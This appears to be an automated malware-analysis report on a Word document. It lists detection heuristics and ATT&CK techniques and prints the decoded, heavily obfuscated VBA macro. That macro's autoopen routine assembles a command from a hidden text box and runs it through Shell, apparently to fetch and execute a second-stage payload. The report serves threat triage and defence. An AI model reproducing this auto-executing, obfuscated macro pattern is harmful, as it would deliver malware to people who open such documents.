MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a VBA macro with an autoopen subroutine that utilizes the Shell() function to execute commands. This indicates an attempt to download and execute a secondary payload. The presence of multiple high-severity heuristics related to VBA macros and command execution, along with a critical ClamAV detection, strongly suggests malicious intent.
Heuristics 10
-
ClamAV: Doc.Malware.Generic-6781940-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6781940-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(YXiOXia, NYpjntCoqoQ), Fosnfh) Set wvhJIUdocdjrYVQUYaTv = TUmPZqHqssSZvHqWEijhd -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() izjvG -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7696 bytes |
SHA-256: c894a1a0acc85eb518da5427ff359b04c647298334750e2e1a305e4a1465cc03 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
198 of 243 identifiers look randomly generated (e.g. 'jfElELfDGbYmfrDuQkhaXDFh') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wGcKOWAGn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
izjvG
End Sub
Attribute VB_Name = "fHJMNDOi"
Function izjvG()
On Error Resume Next
Set jfLTTLwNZEhLdHAn = GZOqRJlpGdfTGtNAd
brUzzRasYOcwqujzNXwUP = Sqr(adMhTuSLTKzWZvwJbw)
YlWNJnkjGfqEIVFQq = 243576335 * Oct(zfZNuRzUVnDEvzErk) * 30469940 * CuiKLfdFrBTiFYKwk - (335181560 + CLng(bvMTPvDbuFDdUMaiWP) * 138156564 * CBool(90548992))
RMGSBJzjkAUsNdUqbSOIE = ChrW(AnXzSfpojPlpKjGANmGuJ)
Set TrNAURSoihkToXWfupEPz = wJwJhGOtNhcRfAoTIjAitUE
koRsWvaJibuEDKk = Sqr(akUCqWrVrahXPVwb)
qZspVXSHTjDFkPz = 314045371 * Oct(EJABQNzvBvOCuNdTwNlsWE) * 82902020 * vXnnQGKjcaQpbD - (171159991 + CLng(vtUbEEZWamlBMDSz) * 320153305 * CBool(333952184))
saJfuliaUwnsvnZ = ChrW(cklzrwRMiVIWYIRscwhllOZq)
Set UriDUJPOIKHstCi = bNrOvVtjNGLIaHJTEpZvibqS
ZwAovKLJhCVYGMz = Sqr(wqOzGnBBnoEciRzWZGVYsrSw)
zsEnvwcazjlcUAmvzBHFjaQD = 338649456 * Oct(zqaEGXRzHvwOspbBlkOtEFjd) * 300515657 * LqQZbBnwwlAsZNKXtrwkJR - (199532607 + CLng(ojoFutGzLQMbhiTvavqpB) * 295786888 * CBool(71028781))
ihMsfIhtMikvMi = ChrW(EfChIBjpLYCKNa)
Set OBORctusitHzvbERcABRYQ = hYktdNoMTLWzJjGlzwjGmmj
rwQwklLQzHjtrARfph = Sqr(oYbvkWOCUrKHuoNBjzqciz)
CBzNtziAQEwvzPB = 206828708 * Oct(VjqYmAmEiwlizFFoSZu) * 246499969 * VCpqtCvsQlfROGz - (62002580 + CLng(PANIPBtSRztHiqGtSzjAh) * 296641018 * CBool(333781451))
LNMGQkwFikJuYBFBwYcCCll = ChrW(YXvHTIzWBWwBonBjBncujMV)
Const NYpjntCoqoQ = 0
Set qqbGAinvUjsRjAR = uHAFMwLOttjbCdfWRccIl
EUmZrlFqfmIMmoDhrr = Sqr(MMGwLtrDWADYJzZCjSnH)
ICOwTqqrSjkkdZJwVbj = 342012449 * Oct(jqcOzONmXOEkEDJsCsDAM) * 26008018 * SnjYQDKrHHtZMliUb - (194891365 + CLng(uUjAYVzFTjczUfY) * 66779658 * CBool(173946543))
pwiNXzcLdwGTYbXHJw = ChrW(nHCQwrIiIYunbHBlhXhwj)
Set pjJIonijmsDzvdVpKdDtnCr = QEHjHqwzqihjwD
jjZcBuoZjODLQiUEms = Sqr(rjfvbwwFJQvpqHK)
JNaqGbfaVEffPVZuop = 77587638 * Oct(DowjEofIkZMEGNKqMCCQE) * 33318560 * WRRqoqBAAvaRVPulRvW - (274479855 + CLng(saYCKjhmnvfwObOnwrSjYLJf) * 319433884 * CBool(270437090))
SQkUhPdiqsndHTONzuS = ChrW(nfwSEEGXjRtFVIO)
Set tUTNqRvmVuZQkCWr = dwRuhmUhdpEODqND
UqiQXWJDkKIGpUiQjjCoP = Sqr(hzfMbqXRELMDifIt)
bIqzcLboVWzWKLP = 122016805 * Oct(JilLuSjSGwtmlCH) * 255208161 * bfYOFnDXGUZutAzkZWa - (53560829 + CLng(jpKfVPiCjTqkkkjtuDuioozG) * 153614133 * CBool(85630678))
vBMfhiiuqOjjYUUWBjKJQOqf = ChrW(fZHssDHITmBXoIFFp)
Set BnMiREZJuTnoLmiubWXPcSki = pncJwbqjqowPRkLVB
fDJRujdkjzaWjChRbQ = Sqr(zzszHVzhfKlLtbwEaHYtwfMv)
GUFthAJuZBVnGBvzwwZvlju = 237648544 * Oct(HJDXATlzEBArowJcRUZdRTFc) * 318126973 * hmzGZZVvZrFXZijqCAvFKzQS - (137887529 + CLng(VGjoDbaClzzzcbVs) * 166468032 * CBool(120350456))
turtbQFhqmiVhlMEPP = ChrW(niwWwktFXTkSawwbRdNEX)
Set WLQjdvvFfAUwES = pHkRCAFRZQcjWEffBsz
CYDiLzCzsnAZVMdzubfDRt = Sqr(QBOZBzVTEGiWRDBFFwHYlQD)
JailZMuWJjnhwYBw = 156971557 * Oct(wTqpMusWaFJUFAwEPa) * 111699772 * trMINkQUIjzIBSTjTTOot - (21821158 + CLng(oMoamjsIahoaEGicbdXNtI) * 7603666 * CBool(129194157))
jOkwMcpqFXvYJdlQYWbMrO = ChrW(lrmKWpsjLUnGUIMOEwjz)
Set mzsBKdFIYEhOrwNcGiN = aviCRCKVvvijpX
PItHsvrzhYniWWLKodrwrV = Sqr(kHSjNcWAZUGzTNWUHivwdi)
ozjktCzYwuSJzZLiWL = 158119991 * Oct(NQYrzRIjPvYNFnik) * 196340864 * czbwHDBDXuvDYkFQGXarncu - (95548365 + CLng(CVFDLvbAiiamRIV) * 276409035 * CBool(301387050))
NnMXnIphGJmEADMnFhwzLzU = ChrW(uCfdoPEBtijawf)
Set LzhOKYjSqPQrGVidpaMbJqp = IfmifwuWThbWupa
lHokiDWijhaNZMkUHaFilA = Sqr(sUuXZtIiAAYpCBEYEJDCzY)
zHwHOUjvClTwQojwpYwZM = 6885673 * Oct(iSDBAVhzpUmwQcmtOR) * 33029961 * EiFojYMOiwzUwkOoLS - (226808791 + CLng(UoicdrPUDfkHHiSzNOS) * 185513120 * CBool(60776034))
SrUSAfOwhwjfBQEdLr = ChrW(sLzOrMRSOazzGQA)
Set HnCwUDmzMiOQwondp = IBDRVISUIiipcLSFdDXDfiu
pJFCJOWjaOrzOqSt = Sqr(AuDTXCDwtKkFmNaHqbLD)
KtLvPNUUqnkiZfnqt = 121670757 * Oct(CEQDldoBQqXPGqO) * 276360464 * rXIoiiDXzaMinQ - (324492233 + CLng(DALupaRaMDdSXdo) * 75844005 * CBool(273799564))
zWKSTaMjlCbSdaaGDpCvLR = ChrW(hciAkzVmBsAQawk)
Set usKFcYwZTzttJHqqfY = avGkcjwUbhbCapm
QHIZErIQGEwYnzBTBij = Sqr(oHiVdDXrsvSDWjajWzA)
mqiYlahdjHBwFMjIYnwAU = 113398643 * Oct(LlvBDXRzBiBnzdKkDWt) * 74349333 * tWwKzRLjCzNVRTmpYdGOK - (340274415 + CLng(EZmfOCtibFnRPwrDF) * 44210092 * CBool(93483134))
inRfKYuismzatEukNmzjJVmP = ChrW(BWthaBHvAnQHGVpIPloI)
YXiOXia = wGcKOWAGn.TextBox1 + CGpSJ + IBBBIBBw + pitQddH + XukzG + KqbkizN + OFEMoGS + qKVhCrQ + SjivY + BCKvYEv + PXCFTRc
Set DoBdtnLOoVhlnm = FKwLcVPcFsJsVVdhKiKiqz
IjtFBAKRHwOawOObio = Sqr(vlkuqtKoXHcDwHpn)
iQNcuaBvGuhSvCctiBj = 157122868 * Oct(DLqLnKfsQSGantSajBKjzj) * 333304541 * WbEAJTGFPmfEWRHQWDqc - (177673162 + CLng(IJJTvAZopTNNpLGfizMALAN) * 93465283 * CBool(25591506))
tuNvtWCiTuqqYGjbz = ChrW(rJbwJqUsQajIwvPc)
Set XVVfftMPDFHrXlMKwzADQ = WCYGfiGdfFtwXN
nbRuobVljHjjBVfEISW = Sqr(SHZOiIaZCzbNzmJYjJcZARsz)
uEHABldBNFjBDMfBwiifWkO = 79488146 * Oct(VzpwzBOZTnESZBM) * 328037631 * lhdWfzzYEiJTYKpv - (302847046 + CLng(lnFODRbjYaiWhWhKzhij) * 270329301 * CBool(12603590))
YvSFGucOXfVaJGWdMuwYWph = ChrW(mlOLIMKrkvhTlL)
Set awFTtAKiGAWiGJd = LWQmBKEYccHTjAUAfjn
zYHYwzEiTHkDhIuUELF = Sqr(uhrQtquFfWCWWCcmO)
qDGZFUsDmaGAwUiXjQjqiFD = 331454593 * Oct(zFNhijHFMVCJUcXYpETzfZhs) * 332327971 * MGYNkAIbIPiWHuzujz - (184398550 + CLng(LoJSoBjwSXXViIUBh) * 333356708 * CBool(238524387))
BtTHuTzZAkqiQj = ChrW(XwGZjQJIlsInwazN)
Set BXDWpZYhjHfFjsiDjiwY = wDWJRABjXIhQZtWjMqXswqFd
zZBboTEShFThMYYWBIzzpJzL = Sqr(UoZjAFzsKRbzEipczr)
DCASwVuhGfJpapHTffljzV = 263683322 * Oct(GzWwZJUsRKIRUW) * 176422638 * FYrNAcAJwPKzLKph - (96346932 + CLng(LBwwHwLRXPhqzJEabbibCdwN) * 341801901 * CBool(71728252))
XjHVbCWKZMHQuBiFlcGPBtkj = ChrW(CnviElwwznkQtFnd)
Set JpsmjYCWJlKrnLViUNZJvPYH = GAwRcbESzEIwFq
jfElELfDGbYmfrDuQkhaXDFh = Sqr(GYpGMmPXiaPKmDsb)
rpDpYatKsLXPYfaXbwmpwtpJ = 94746045 * Oct(RnjdhowaLPiUhw) * 313121133 * UarIGupnLEFlAwAtaXJGaOii - (111214586 + CLng(TLsGQouzZOSGvWwvScjNZNOk) * 301236082 * CBool(69143885))
pVGwIrIbivEoRrAYlbUbnH = ChrW(vBzDXFwINGzEiTSJPnvU)
Set lIvFSZkjMjMtQdGTkz = WwZslTzjwWBGDWGJq
tlMQPEYmILqDlLF = Sqr(CYMQJlTsoMKZIXKTPOqO)
GhUUzLnqslqAXU = 223168801 * Oct(awISTbCuwdlBWoXVrdvrrvJa) * 209430085 * wbUZlCcWoRivii - (200677290 + CLng(VWZlTDNVItYqFfnhmQf) * 180928554 * CBool(172392084))
siZAAFmvvQNRamAujsN = ChrW(QrilQJiAJRzCzvirMSDIiNwH)
Set mYiMjwaUqTVZsXKPzJJG = ifGmzSUtFVttiWJ
cYUcYfpIflvGUOfPiVEtc = Sqr(idFalwbfNBBhVkpiiCp)
GMXOZqpiOIRPFCprWwurjAYt = 35032393 * Oct(tuaAnCDiTWGrBuIzQEkmbS) * 309213901 * IkHwRGndIlzuEOVPLbjSkiwA - (227963813 + CLng(kTJTLbAcsCuEMNidjPwNt) * 10690809 * CBool(228235971))
aAibNioHQjVTTpaWuc = ChrW(TVHOWkHvjEUoilosKs)
oSVZoc = Array(ZiBhq, uJnkV, mriRmWFS, Interaction _
_
_
_
_
_
_
_
.Shell(YXiOXia, NYpjntCoqoQ), Fosnfh)
Set wvhJIUdocdjrYVQUYaTv = TUmPZqHqssSZvHqWEijhd
FQDtIVzdrqMziavujdVwkk = Sqr(RcNawTvkNEjPWMfim)
PBbNzcPbKuFLfCUBmQuuzJv = 37105403 * Oct(twKZiEviFUjmDfkKWIAfCZdv) * 135567511 * PnrtFFVPEiECcqJcail - (97879011 + CLng(lJkcBuawTUPEIoHrLOdQn) * 172661110 * CBool(41400810))
UjKVZwvJFrdiHQE = ChrW(vTkKozUBBlOTHwvL)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.